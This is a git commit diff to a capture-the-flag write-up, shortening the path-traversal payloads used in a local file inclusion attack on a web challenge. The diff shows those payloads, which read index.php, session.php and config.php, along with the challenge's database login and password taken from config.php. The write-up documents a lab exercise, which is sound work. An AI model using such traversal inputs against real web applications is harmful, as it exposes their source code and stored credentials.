Bugfix : Clean Path in Goldfish
parent
e4a6aeda85
commit
269d2b3b90
|
@ -157,8 +157,8 @@ I waited hours and hours, nothing happened..
|
|||
Then I try to fuzz a little bit the "name" field since we could "rewrite" the URL. I finally managed to find an LFI with the source code reflected in the dashboard inside the memo. Thanks to this we could extract all the source code of the WebApp
|
||||
|
||||
{% highlight php%}
|
||||
../../././././././././././././././././././index.php
|
||||
../../././././././././././././././././././include/session.php
|
||||
../../index.php
|
||||
../../include/session.php
|
||||
function checkCookie()
|
||||
{
|
||||
$user = null;
|
||||
|
@ -179,7 +179,7 @@ function checkCookie()
|
|||
}
|
||||
}
|
||||
|
||||
../../././././././././././././././././././include/config.php
|
||||
../../include/config.php
|
||||
$db_name = 'web150';
|
||||
$db_login = 'web150';
|
||||
$db_pass = 'Hell0Challenger!';
|
||||
|
|
Loading…
Reference in New Issue